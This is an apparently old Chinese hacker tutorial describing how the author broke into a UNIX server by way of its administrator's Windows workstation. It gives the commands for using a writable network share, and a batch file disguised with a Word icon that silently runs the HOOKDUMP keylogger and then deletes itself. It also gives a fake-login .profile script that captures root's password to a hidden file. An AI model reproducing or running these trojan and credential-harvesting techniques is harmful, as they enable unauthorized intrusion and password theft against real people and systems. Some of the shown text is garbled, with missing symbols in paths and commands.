一种奇特的入侵方式.doc

一种奇特的入侵方式 HI，大家好，我若尘又回来了！ 先抄点废话：你阅读本内容就意味着你同意在法律允许的范围使用本文内容并决不利用本信息获得非授权的存取。本文内容仅供学习参考。如果你不能同意请即刻离开。(By using this file you agree you will use the information on this file for lawful purposes only and will not use this information to gain unauthorized access. Information on this site is for educational purposes ONLY. If you do not agree with this, please leave now.)- 别怪我卖关子，我要先谈谈“常规”的入侵方法是什么。咱得照顾一下初学者嘛。 撇开NT不谈，这次只谈UNIX。一般来说确定目标后，就开始分析它。可以使用FINGER指令看看它上面有些什么用户，然后逮着那些看起来简单的用常用的词试一试（甚至可以用帐号本身），要不就用台湾那个黑客写的LETMEIN（不是KILLUSA写的）暴力往里冲；或者用HAKTEK分析一下目标的端口，如果开着FTP，那么就用FTP的常见漏洞如GUEST帐号开放进入，有些WU-FTP的CORE漏洞还可获得SHADOW；如果开着SENDMAIL也一样，很多SENDMAIL程序都是漏洞百出的拉；如果开着WWW那就更好了，网上的PHF攻击方法写得满天飞，必竟大多数CGI或ASP等程序都是一些小程序员编的，又没有经过充分的测试，一不留神就给咱钻了空子:-)。用这些方法获得的PASSWD再用JOHN之类软件一跑就可获得就个帐号，进去后自然是看看主机有没有明显的漏洞，如/.rhosts，root/.profile，或者可写的/，或者可改的SUID程序，甚至找找有没有先进去的hacker留下来的后门:-)；明显的漏洞没有就查清主机的OS确切版本然后找它的buffer overflow程序，一般都有的。拜托不要告诉我用JOHN来跑它的root口令，虽然很多文章都提到有些root口令设得多简单，为什么我从来没有碰见过:-|。获得root后干什么？当然什么也不干啦！除了清除踪迹然后给网管写封信。我还是觉得黑客的宗旨是进入而不是破坏。 以上内容看不懂拜托不要问我，这不是一句两句讲得清的，您还是把网上那些满天飞的教程再看几遍吧别说那没用，THX的英文教程我都看了不下二十遍，真的是温故而知新呢！当然，我也不介意您把我的教程多看几遍:-)- 好了，言归正传，我这次谈一种很奇特的入侵主机的方法，这种方法目前咱还没在什么书籍上看过，我要申请专利的哟。 Once upon a time，我发现了一个网站，于是常规入侵。很好，它的FINGER开着，于是我编了一个SHELL，从aaa帐号试到zzz（bye the way，这是我发现的一个网上规律，那就是帐号的长度与口令的强度成正比，如果一个帐号只有两三位长，那它的口令一般也很简单，反之亦然，故且称之为若氏定理吧），结果一个帐号也不存在，我没有再试它的帐号。因为我被它开的端口吸引住了，它开着WWW，我就不信它不出错。一连拿了五种CGI和WWW扫描器总计扫了三四百种常见错误它几乎都不存在，我KAO，I服了YOU！也有几个错误，我不知道如何利用，算了。又绕着主机转了几圈，象狐狸遇见刺猬，无从下嘴。 还是看看root的信息吧：finger rootxxx.xxx.xxxLogin name: root In real life: system PRIVILEGED accountDirectory: / Shell: /bin/shLast login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xxNo Plan. root经常来，那个202.xx.xx.xx就是他用的工作站了，从那会不会看到点东西呢？ net view 202.xx.xx.xxShared resources at 202.xx.xx.xxSharename Type Commentxx我的公文包 Disk The command was completed successfully. 在上网的机器上开着WINDOWS的“文件和打印机共享”的服务，是很多人容易掉以轻心的，这个root没有例外。如果它的C盘共享了而且可写那就好了，但那是做梦，现在开了共享的目录没有一个是根目录，连D驱的都没有，别着急，慢慢来。x掉的那些文件夹都没用，不能写，里面尽是些英文原著，这个root还挺行的。“我的公文包”吸引了我的注意，这是一个用于将不同的机器上的资料进行同步的工具，很显然这个root要经常更新主机上的主页，有时候在自己的机器上编，有时候在主机上编所以很重要的一点：“我的公文包”的共享一般都是可写的！ 那我再进去看看。 net use i: 202.xx.xx.xx i: echo asdftemp.txt不错，确实可写 del temp.txt不留痕迹黑客的习惯 dir/od/p看看都有些什么倒数第二排那个是什么？“X月工作计划.doc”！就是它了，即然是计划就不可能写完了就丢一边，它肯定会再次打开它的至少下个月写计划时要COPY一下:- 该动手了，我的目标就是让它下次打开时误中我的陷阱而运行我藏的木马。我这次用的是一个键盘计录软件HOOKDUMP，我觉得它挺好的，价钱实惠，量也足对不起，说习惯了，应该是它不仅记录下全部击键，还记录下打开或关掉了什么程序、按过什么按纽、用过什么菜单总之，它的记录让你就和你站在他身后看他操作计算机一样详细了。您要问那么多木马你为啥装这个？要知道无论是中国的冰河、netspy还是外国的netbus、BO，都被各种杀毒软件列为头号侦查对象，而一个root的机器上可不可能没装杀毒软件？还是HOOKDUMP好，小小的，不起眼，不过如果大家都用只怕我再用它的机会就少了 copy hookdump.* i: 补充一点：上传前先编好它的hookdump.ini文件，置为隐藏方式运行，不然root一运行屏幕上蹦出一大窗口可就溴大了。 然后再在自己的机器上编一个同名的BAT文件：X月工作计划.BAT edit c:X月工作计划.BATecho offhookdumpattrib -h X月工作计划.docc:progra1micros1officewinword X月工作计划.docattrib -h temp.batdel temp.pifdel temp.bat 看明白了吧？root运行了这个BAT文件实际上就是先运行木马，再调用WINWORD文件打开它想开的这个文件，然后自我删除，也许它机器上WINWORD的位置不同，那调用就会失败，不过不要紧，反正BAT会马上删除，他会以为是自己的误操作。 这时你的C驱根目录就有了这么一个BAT文件，它是一个方形的图标，和那个WORD文件大相径庭，root怎么会运行它呢？没关系，在这个文件上点右键，点属性，在“程序”栏选“更改图标”不就行了吗？WORD的图标在你机器c:progra1micros1offic中。还要将“运行”改为“最小化”，“退出时关闭”打上勾，这样才能保证在运行时一点迹象也没有。事实上这个BAT文件变成了两个，还有一个PIF文件就是它的图标。 把这两个文件传上去： copy X月工作计划.bat i: copy X月工作计划.pif i: 然后把它的文件和自己的文件都藏起来： attrib +h X月工作计划.doc attrib +h X月工作计划.bat 这样，root的“公文包”里只剩下一个和原来一模一样的WORD图标，他做梦也没想到这已变成了一个BAT文件。然后可以喘口气了，让我们静静的等 几天后，我进入这个工作站，取下记录下来的击键记录，找出root的口令，进入主机。- 看明白了吗？这种入侵方法就是对那些铜墙铁壁的主机不是强往里冲而是查操作该主机的root所使用的机器，那是他的“座机”，“舒适”才是他想要的，因此强度也就大大减小。进入他的“座机”后跟踪他的操作，不就轻易的获得钥匙了吗？顺便说一下，其实那个“我的公文包”文件夹的共享是加了口令的，我另费了一番周折才进去，不过这和入侵方式无关，我下回再讲怎么进有口令的共享文件夹。 好了，看在我敲得手指发麻的份上，您也该回答我一个问题了： 条件：已获得某主机的rootshell，假设名为.fool (-rwsr-xr-x 1 root system 131072 .fool) 目标：获得该主机root的帐号 提示：方法一:即然已是root，可以装一个sniffer，嗅探口令，不过主机是Digital 4.0B，常见的esniff，dsniff，sniffit都不能运行，你再推荐一个？ 方法二：做一个假LOGIN的SHELL，将原LOGIN程序改名，收集了帐号的口令后调用真的LOGIN程序，但我发现LOGIN程序一旦改名就不能运行了！ 方法三：在root的HOME目录中改它的.profile如下：clearechoechoecho Digital UNIX (lwh000) (ttyp0)echoecho login:rootecho Password:echo Login incorrectecho login:cread lginstty -echoecho Password:cread pwstty echoecho Login:$lgin - Pword:$pw /tmp/.autobkecho echo Last login: Tue Jul 18 11:05:25 from pa1002echo echo Digital UNIX V4.0B (Rev. 564); Sat Mar 18 11:02:04 CST 2000# 中间这一段太长，就不写了，实际上就是伪装主机的欢迎词echo echo# 这以下是root的原.profilePATH=$HOME/bin:$PATH:-/usr/bin:.export PATHif ! $DT ; thenstty dectset -I -Qfi 看出来没，实际上root正确登录后，第一句clear擦掉欢迎词，然后伪写登录不成功，让他再输一次，然后记录下来，再伪写上欢迎词，执行正常的.profile内容。 但是TELNET反应是较慢的，第一句clear再快也能看出屏幕有一个闪烁，细心的root也许会留意，如果能关掉UNIX的欢迎词就好了，怎么做？ 当然，只要能达成目标，您尽可以提出您的方法，不要拘泥于我想的这几种。 请给我写信- 谈到写信，我再补充几句（!$#!%，别砸，真的是最后几句了），前不久有个家伙给我发了一封信，没名称没地址，只有一个附件look.exe我有些不明白：你怎么有把握我一定会运行？你又有何后续手段知道我是